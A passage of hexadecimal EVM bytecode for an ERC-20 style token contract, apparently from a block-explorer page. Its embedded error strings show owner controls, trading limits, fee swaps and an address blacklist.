09351146103cf5780634fbee1931461040b578063583e0568146104475780636ddd17131461047157806370a082311461049b5761022f565b806318160ddd116101f757806318160ddd146102d95780632315bf141461030357806323b872dd1461033f578063311028af1461037b578063313ce567146103a55761022f565b806306fdde0314610233578063095ea7b31461025d5780630c6b6737146102995780630f054c06146102c35761022f565b3661022f57005b5f80fd5b34801561023e575f80fd5b506102476108b3565b6040516102549190612cca565b60405180910390f35b348015610268575f80fd5b50610283600480360381019061027e9190612d7b565b610943565b6040516102909190612dd3565b60405180910390f35b3480156102a4575f80fd5b506102ad610965565b6040516102ba9190612dfb565b60405180910390f35b3480156102ce575f80fd5b506102d761096b565b005b3480156102e4575f80fd5b506102ed610996565b6040516102fa9190612dfb565b60405180910390f35b34801561030e575f80fd5b5061032960048036038101906103249190612e14565b61099f565b6040516103369190612dd3565b60405180910390f35b34801561034a575f80fd5b5061036560048036038101906103609190612e3f565b6109f1565b6040516103729190612dd3565b60405180910390f35b348015610386575f80fd5b5061038f610a1f565b60405161039c9190612dfb565b60405180910390f35b3480156103b0575f80fd5b506103b9610a25565b6040516103c69190612eaa565b60405180910390f35b3480156103da575f80fd5b506103f560048036038101906103f09190612d7b565b610a2d565b6040516104029190612dd3565b60405180910390f35b348015610416575f80fd5b50610431600480360381019061042c9190612e14565b610a63565b60405161043e9190612dd3565b60405180910390f35b348015610452575f80fd5b5061045b610ab5565b6040516104689190612f1e565b60405180910390f35b34801561047c575f80fd5b50610485610ad9565b6040516104929190612dd3565b60405180910390f35b3480156104a6575f80fd5b506104c160048036038101906104bc9190612e14565b610aec565b6040516104ce9190612dfb565b60405180910390f35b3480156104e2575f80fd5b506104eb610b31565b005b3480156104f8575f80fd5b50610501610b44565b005b34801561050e575f80fd5b5061052960048036038101906105249190612f61565b610b68565b005b348015610536575f80fd5b50610551600480360381019061054c9190612f9f565b610bc8565b005b34801561055e575f80fd5b50610567610cab565b005b348015610574575f80fd5b5061057d610d3b565b60405161058a9190612fd9565b60405180910390f35b34801561059e575f80fd5b506105a7610d63565b6040516105b49190612cca565b60405180910390f35b3480156105c8575f80fd5b506105e360048036038101906105de9190612e14565b610df3565b6040516105f09190612dd3565b60405180910390f35b348015610604575f80fd5b5061061f600480360381019061061a9190612f61565b610e10565b005b34801561062c575f80fd5b5061064760048036038101906106429190612d7b565b610eb5565b6040516106549190612dd3565b60405180910390f35b348015610668575f80fd5b50610683600480360381019061067e9190612d7b565b610f2a565b6040516106909190612dd3565b60405180910390f35b3480156106a4575f80fd5b506106bf60048036038101906106ba9190612f9f565b610f4c565b005b3480156106cc575f80fd5b506106e760048036038101906106e29190612f61565b610f71565b005b3480156106f4575f80fd5b506106fd61101f565b60405161070a9190612dfb565b60405180910390f35b34801561071e575f80fd5b50610727611025565b005b348015610734575f80fd5b5061073d611559565b60405161074a9190612dfb565b60405180910390f35b34801561075e575f80fd5b5061076761155f565b6040516107749190612dfb565b60405180910390f35b348015610788575f80fd5b50610791611565565b60405161079e9190612fd9565b60405180910390f35b3480156107b2575f80fd5b506107cd60048036038101906107c89190612ff2565b61158a565b6040516107da9190612dfb565b60405180910390f35b3480156107ee575f80fd5b506107f761160c565b6040516108049190612dfb565b60405180910390f35b348015610818575f80fd5b50610821611612565b60405161082e9190612dfb565b60405180910390f35b348015610842575f80fd5b5061085d60048036038101906108589190612e14565b611618565b005b34801561086a575f80fd5b5061087361169a565b6040516108809190612dfb565b60405180910390f35b348015610894575f80fd5b5061089d6116a0565b6040516108aa9190612dd3565b60405180910390f35b6060600380546108c29061305d565b80601f01602080910402602001604051908101604052809291908181526020018280546108ee9061305d565b80156109395780601f1061091057610100808354040283529160200191610939565b820191905f5260205f20905b81548152906001019060200180831161091c57829003601f168201915b5050505050905090565b5f8061094d6116b2565b905061095a8185856116b9565b600191505092915050565b60115481565b61097361187c565b5f61097d30610aec565b90505f811115610993576109923033836118fa565b5b50565b5f600254905090565b5f60065f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff169050919050565b5f806109fb6116b2565b9050610a088582856122f1565b610a138585856118fa565b60019150509392505050565b600c5481565b5f6012905090565b5f80610a376116b2565b9050610a58818585610a49858961158a565b610a5391906130ba565b6116b9565b600191505092915050565b5f60175f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff169050919050565b7f000000000000000000000000000000000000000000000000000000000000000081565b601260019054906101000a900460ff1681565b5f805f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b610b3961187c565b610b425f61237c565b565b610b4c61187c565b5f610b55610996565b905080600d8190555080600e8190555050565b610b7061187c565b8060185f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055505050565b600b5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16610c086116b2565b73ffffffffffffffffffffffffffffffffffffffff1614610c27575f80fd5b5f610c30610996565b90505f610c3c30610aec565b90505f60648484610c4d91906130ed565b610c57919061315b565b905080821015610c9c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c93906131d5565b60405180910390fd5b610ca58161243f565b50505050565b610cb361187c565b5f4711610cf5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cec9061323d565b60405180910390fd5b3373ffffffffffffffffffffffffffffffffffffffff166108fc4790811502906040515f60405180830381858888f19350505050158015610d38573d5f803e3d5ffd5b50565b5f60055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060048054610d729061305d565b80601f0160208091040260200160405190810160405280929190818152602001828054610d9e9061305d565b8015610de95780601f10610dc057610100808354040283529160200191610de9565b820191905f5260205f20905b815481529060010190602001808311610dcc57829003601f168201915b5050505050905090565b6006602052805f5260405f205f915054906101000a900460ff1681565b610e1861187c565b60095f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610ea7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e9e906132cb565b60405180910390fd5b610eb18282612693565b5050565b5f80610ebf6116b2565b90505f610ecc828661158a565b905083811015610f11576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f0890613359565b60405180910390fd5b610f1e82868684036116b9565b60019250505092915050565b5f80610f346116b2565b9050610f418185856118fa565b600191505092915050565b610f5461187c565b670de0b6b3a764000081610f6891906130ed565b600f8190555050565b610f7961187c565b8060175f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7826040516110139190612dd3565b60405180910390a25050565b600d5481565b61102d61187c565b60125f9054906101000a900460ff161561107c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611073906133c1565b60405180910390fd5b6110a9307f0000000000000000000000000000000000000000000000000000000000000000600c546116b9565b60095f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663095ea7b37f00000000000000000000000000000000000000000000000000000000000000007fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff6040518363ffffffff1660e01b81526004016111459291906133df565b6020604051808303815f875af1158015611161573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190611185919061341a565b505f7f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156111f0573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906112149190613459565b90505f8173ffffffffffffffffffffffffffffffffffffffff166370a0823160095f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff166040518263ffffffff1660e01b81526004016112719190612fd9565b602060405180830381865afa15801561128c573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906112b09190613498565b90505f6112c96039600c5461273190919063ffffffff16565b90505f8083111561146e576112e7834761279690919063ffffffff16565b90505f61130f8261130186866127ab90919063ffffffff16565b6127c090919063ffffffff16565b905061133d3060095f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16836127d5565b60095f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663fff6cae96040518163ffffffff1660e01b81526004015f604051808303815f87803b1580156113a3575f80fd5b505af11580156113b5573d5f803e3d5ffd5b505050507f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663f305d7198330865f87611402610d3b565b426040518863ffffffff1660e01b8152600401611424969594939291906134fc565b60606040518083038185885af1158015611440573d5f803e3d5ffd5b50505050506040513d601f19601f82011682018060405250810190611465919061355b565b5050505061151e565b7f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663f305d7194730855f806114b7610d3b565b426040518863ffffffff1660e01b81526004016114d9969594939291906135ab565b60606040518083038185885af11580156114f5573d5f803e3d5ffd5b50505050506040513d601f19601f8201168201806040525081019061151a919061355b565b5050505b6001601260016101000a81548160ff021916908315150217905550600160125f6101000a81548160ff02191690831515021790555050505050565b60105481565b60145481565b60085f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b5f60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b60135481565b600f5481565b61162061187c565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff160361168e576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116859061367a565b60405180910390fd5b6116978161237c565b50565b600e5481565b60125f9054906101000a900460ff1681565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611727576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161171e90613708565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611795576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161178c90613796565b60405180910390fd5b8060015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258360405161186f9190612dfb565b60405180910390a3505050565b6118846116b2565b73ffffffffffffffffffffffffffffffffffffffff166118a2610d3b565b73ffffffffffffffffffffffffffffffffffffffff16146118f8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118ef906137fe565b60405180910390fd5b565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611968576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161195f9061388c565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036119d6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016119cd9061391a565b60405180910390fd5b60065f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16158015611a74575060065f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b611ab3576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611aaa906139a8565b60405180910390fd5b60155460105410611ac75760056013819055505b60165460115410611adb5760056014819055505b5f8103611af257611aed83835f6127d5565b6122ec565b611afa610d3b565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614158015611b685750611b38610d3b565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015611ba057505f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015611bda575061dead73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015611bf35750600b60149054906101000a900460ff16155b15611fd05760125f9054906101000a900460ff16611ce65760175f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1680611ca6575060175f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b611ce5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611cdc90613a10565b60405180910390fd5b5b60195f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff168015611d83575060185f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b15611e3257600d54811115611dcd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611dc490613a9e565b60405180910390fd5b600e54611dd983610aec565b82611de491906130ba565b1115611e25576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611e1c90613b06565b60405180910390fd5b611e2d612a41565b611fcf565b60195f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff168015611ecf575060185f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b15611f2657600d54811115611f19576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611f1090613b94565b60405180910390fd5b611f21612a93565b611fce565b60185f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16611fcd57600e54611f8083610aec565b82611f8b91906130ba565b1115611fcc576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611fc390613b06565b60405180910390fd5b5b5b5b5b5f611fda30610aec565b90505f8082119050808015611ffb5750601260019054906101000a900460ff165b80156120145750600b60149054906101000a900460ff16155b8015612067575060195f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b80156120ba575060175f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b801561210d575060175f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b15612151576001600b60146101000a81548160ff02191690831515021790555061213683612aac565b5f600b60146101000a81548160ff0219169083151502179055505b5f600b60149054906101000a900460ff1615905060175f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1680612200575060175f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b15612209575f90505b5f81156122dc5760195f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff161561228e576122876064612279601454886127ab90919063ffffffff16565b6127c090919063ffffffff16565b90506122b9565b6122b660646122a8601354886127ab90919063ffffffff16565b6127c090919063ffffffff16565b90505b5f8111156122cd576122cc8730836127d5565b5b80856122d99190613bb2565b94505b6122e78787876127d5565b505050505b505050565b5f6122fc848461158a565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146123765781811015612368576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161235f90613c2f565b60405180910390fd5b61237584848484036116b9565b5b50505050565b5f60055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690508160055f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f600267ffffffffffffffff81111561245b5761245a613c4d565b5b6040519080825280602002602001820160405280156124895781602001602082028036833780820191505090505b50905030815f815181106124a05761249f613c7a565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250507f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015612543573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906125679190613459565b8160018151811061257b5761257a613c7a565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250506125e0307f0000000000000000000000000000000000000000000000000000000000000000846116b9565b7f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663791ac947835f84600b5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16426040518663ffffffff1660e01b8152600401612662959493929190613d5e565b5f604051808303815f87803b158015612679575f80fd5b505af115801561268b573d5f803e3d5ffd5b505050505050565b8060195f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508015158273ffffffffffffffffffffffffffffffffffffffff167fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab60405160405180910390a35050565b5f6064821115612776576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161276d90613e26565b60405180910390fd5b6064828461278491906130ed565b61278e919061315b565b905092915050565b5f81836127a39190613bb2565b905092915050565b5f81836127b891906130ed565b905092915050565b5f81836127cd919061315b565b905092915050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603612843576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161283a9061388c565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036128b1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016128a89061391a565b60405180910390fd5b6128bc838383612c36565b5f805f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205490508181101561293f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161293690613eb4565b60405180910390fd5b8181035f808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550815f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051612a289190612dfb565b60405180910390a3612a3b848484612c3b565b50505050565b60105f815480929190612a5390613ed2565b9190505550600f60105403612a9157612a903060085f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16600f546127d5565b5b565b60115f815480929190612aa590613ed2565b9190505550565b5f612ab630610aec565b90505f808203612ac7575050612c33565b5f601454601354612ad891906130ba565b03612b52575f82118015612aed5750600f5482105b15612afa57819050612b4d565b5f612b236064612b15601454876127ab90919063ffffffff16565b6127c090919063ffffffff16565b90508084612b319190613bb2565b9350600f54841115612b4757600f549150612b4b565b8391505b505b612c27565b5f82118015612b755750612b726002600f546127c090919063ffffffff16565b82105b15612b81575050612c33565b5f82118015612ba45750612ba16002600f546127c090919063ffffffff16565b82115b8015612bb15750600f5482105b15612bd357612bcc6002600f546127c090919063ffffffff16565b9050612c26565b5f612bfc6064612bee601454876127ab90919063ffffffff16565b6127c090919063ffffffff16565b90508084612c0a9190613bb2565b9350600f54841115612c2057600f549150612c24565b8391505b505b5b612c308161243f565b50505b50565b505050565b505050565b5f81519050919050565b5f82825260208201905092915050565b5f5b83811015612c77578082015181840152602081019050612c5c565b5f8484015250505050565b5f601f19601f8301169050919050565b5f612c9c82612c40565b612ca68185612c4a565b9350612cb6818560208601612c5a565b612cbf81612c82565b840191505092915050565b5f6020820190508181035f830152612ce28184612c92565b905092915050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f612d1782612cee565b9050919050565b612d2781612d0d565b8114612d31575f80fd5b50565b5f81359050612d4281612d1e565b92915050565b5f819050919050565b612d5a81612d48565b8114612d64575f80fd5b50565b5f81359050612d7581612d51565b92915050565b5f8060408385031215612d9157612d90612cea565b5b5f612d9e85828601612d34565b9250506020612daf85828601612d67565b9150509250929050565b5f8115159050919050565b612dcd81612db9565b82525050565b5f602082019050612de65f830184612dc4565b92915050565b612df581612d48565b82525050565b5f602082019050612e0e5f830184612dec565b92915050565b5f60208284031215612e2957612e28612cea565b5b5f612e3684828501612d34565b91505092915050565b5f805f60608486031215612e5657612e55612cea565b5b5f612e6386828701612d34565b9350506020612e7486828701612d34565b9250506040612e8586828701612d67565b9150509250925092565b5f60ff82169050919050565b612ea481612e8f565b82525050565b5f602082019050612ebd5f830184612e9b565b92915050565b5f819050919050565b5f612ee6612ee1612edc84612cee565b612ec3565b612cee565b9050919050565b5f612ef782612ecc565b9050919050565b5f612f0882612eed565b9050919050565b612f1881612efe565b82525050565b5f602082019050612f315f830184612f0f565b92915050565b612f4081612db9565b8114612f4a575f80fd5b50565b5f81359050612f5b81612f37565b92915050565b5f8060408385031215612f7757612f76612cea565b5b5f612f8485828601612d34565b9250506020612f9585828601612f4d565b9150509250929050565b5f60208284031215612fb457612fb3612cea565b5b5f612fc184828501612d67565b91505092915050565b612fd381612d0d565b82525050565b5f602082019050612fec5f830184612fca565b92915050565b5f806040838503121561300857613007612cea565b5b5f61301585828601612d34565b925050602061302685828601612d34565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061307457607f821691505b60208210810361308757613086613030565b5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f6130c482612d48565b91506130cf83612d48565b92508282019050808211156130e7576130e661308d565b5b92915050565b5f6130f782612d48565b915061310283612d48565b925082820261311081612d48565b915082820484148315176131275761312661308d565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f61316582612d48565b915061317083612d48565b9250826131805761317f61312e565b5b828204905092915050565b7f4e6f7420656e6f75676820746f6b656e730000000000000000000000000000005f82015250565b5f6131bf601183612c4a565b91506131ca8261318b565b602082019050919050565b5f6020820190508181035f8301526131ec816131b3565b9050919050565b7f546f6b656e3a206e6f2045544820746f20636c656172000000000000000000005f82015250565b5f613227601683612c4a565b9150613232826131f3565b602082019050919050565b5f6020820190508181035f8301526132548161321b565b9050919050565b7f54686520706169722063616e6e6f742062652072656d6f7665642066726f6d205f8201527f6175746f6d617465644d61726b65744d616b6572506169727300000000000000602082015250565b5f6132b5603983612c4a565b91506132c08261325b565b604082019050919050565b5f6020820190508181035f8301526132e2816132a9565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f775f8201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b5f613343602583612c4a565b915061334e826132e9565b604082019050919050565b5f6020820190508181035f83015261337081613337565b9050919050565b7f54726164696e6720697320616c7265616479206f70656e0000000000000000005f82015250565b5f6133ab601783612c4a565b91506133b682613377565b602082019050919050565b5f6020820190508181035f8301526133d88161339f565b9050919050565b5f6040820190506133f25f830185612fca565b6133ff6020830184612dec565b9392505050565b5f8151905061341481612f37565b92915050565b5f6020828403121561342f5761342e612cea565b5b5f61343c84828501613406565b91505092915050565b5f8151905061345381612d1e565b92915050565b5f6020828403121561346e5761346d612cea565b5b5f61347b84828501613445565b91505092915050565b5f8151905061349281612d51565b92915050565b5f602082840312156134ad576134ac612cea565b5b5f6134ba84828501613484565b91505092915050565b5f819050919050565b5f6134e66134e16134dc846134c3565b612ec3565b612d48565b9050919050565b6134f6816134cc565b82525050565b5f60c08201905061350f5f830189612fca565b61351c6020830188612dec565b61352960408301876134ed565b6135366060830186612dec565b6135436080830185612fca565b61355060a0830184612dec565b979650505050505050565b5f805f6060848603121561357257613571612cea565b5b5f61357f86828701613484565b935050602061359086828701613484565b92505060406135a186828701613484565b9150509250925092565b5f60c0820190506135be5f830189612fca565b6135cb6020830188612dec565b6135d860408301876134ed565b6135e560608301866134ed565b6135f26080830185612fca565b6135ff60a0830184612dec565b979650505050505050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f613664602683612c4a565b915061366f8261360a565b604082019050919050565b5f6020820190508181035f83015261369181613658565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f6136f2602483612c4a565b91506136fd82613698565b604082019050919050565b5f6020820190508181035f83015261371f816136e6565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f613780602283612c4a565b915061378b82613726565b604082019050919050565b5f6020820190508181035f8301526137ad81613774565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f6137e8602083612c4a565b91506137f3826137b4565b602082019050919050565b5f6020820190508181035f830152613815816137dc565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f613876602583612c4a565b91506138818261381c565b604082019050919050565b5f6020820190508181035f8301526138a38161386a565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f613904602383612c4a565b915061390f826138aa565b604082019050919050565b5f6020820190508181035f830152613931816138f8565b9050919050565b7f45524332303a207472616e736665722066726f6d2f746f2074686520626c61635f8201527f6b6c697374656420616464726573730000000000000000000000000000000000602082015250565b5f613992602f83612c4a565b915061399d82613938565b604082019050919050565b5f6020820190508181035f8301526139bf81613986565b9050919050565b7f54726164696e67206973206e6f74206163746976652e000000000000000000005f82015250565b5f6139fa601683612c4a565b9150613a05826139c6565b602082019050919050565b5f6020820190508181035f830152613a27816139ee565b9050919050565b7f427579207472616e7366657220616d6f756e74206578636565647320746865205f8201527f6d61785472616e73616374696f6e416d6f756e742e0000000000000000000000602082015250565b5f613a88603583612c4a565b9150613a9382613a2e565b604082019050919050565b5f6020820190508181035f830152613ab581613a7c565b9050919050565b7f4d61782077616c6c6574206578636565646564000000000000000000000000005f82015250565b5f613af0601383612c4a565b9150613afb82613abc565b602082019050919050565b5f6020820190508181035f830152613b1d81613ae4565b9050919050565b7f53656c6c207472616e7366657220616d6f756e742065786365656473207468655f8201527f206d61785472616e73616374696f6e416d6f756e742e00000000000000000000602082015250565b5f613b7e603683612c4a565b9150613b8982613b24565b604082019050919050565b5f6020820190508181035f830152613bab81613b72565b9050919050565b5f613bbc82612d48565b9150613bc783612d48565b9250828203905081811115613bdf57613bde61308d565b5b92915050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000005f82015250565b5f613c19601d83612c4a565b9150613c2482613be5565b602082019050919050565b5f6020820190508181035f830152613c4681613c0d565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b5f81519050919050565b5f82825260208201905092915050565b5f819050602082019050919050565b613cd981612d0d565b82525050565b5f613cea8383613cd0565b60208301905092915050565b5f602082019050919050565b5f613d0c82613ca7565b613d168185613cb1565b9350613d2183613cc1565b805f5b83811015613d51578151613d388882613cdf565b9750613d4383613cf6565b925050600181019050613d24565b5085935050505092915050565b5f60a082019050613d715f830188612dec565b613d7e60208301876134ed565b8181036040830152613d908186613d02565b9050613d9f6060830185612fca565b613dac6080830184612dec565b9695505050505050565b7f50657263656e74616765206d757374206265206265747765656e203020616e645f8201527f2031303000000000000000000000000000000000000000000000000000000000602082015250565b5f613e10602483612c4a565b9150613e1b82613db6565b604082019050919050565b5f6020820190508181035f830152613e3d81613e04565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320625f8201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b5f613e9e602683612c4a565b9150613ea982613e44565b604082019050919050565b5f6020820190508181035f830152613ecb81613e92565b9050919050565b5f613edc82612d48565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8203613f0e57613f0d61308d565b5b60018201905091905056fea26469706673582212207d7fbcb0b6d300effe94c75a2a61d182d9693af802f2b4d42523ec0414ba848f64736f6c634300081500330000000000000000000000008087a2c5f7a447a0fb95cd9afdfb113f09991c7cb8428766cf24248f0cfdfcc8dfa6fd221b64a68507dfafcf82c514dbff2d3650
Deployed Bytecode
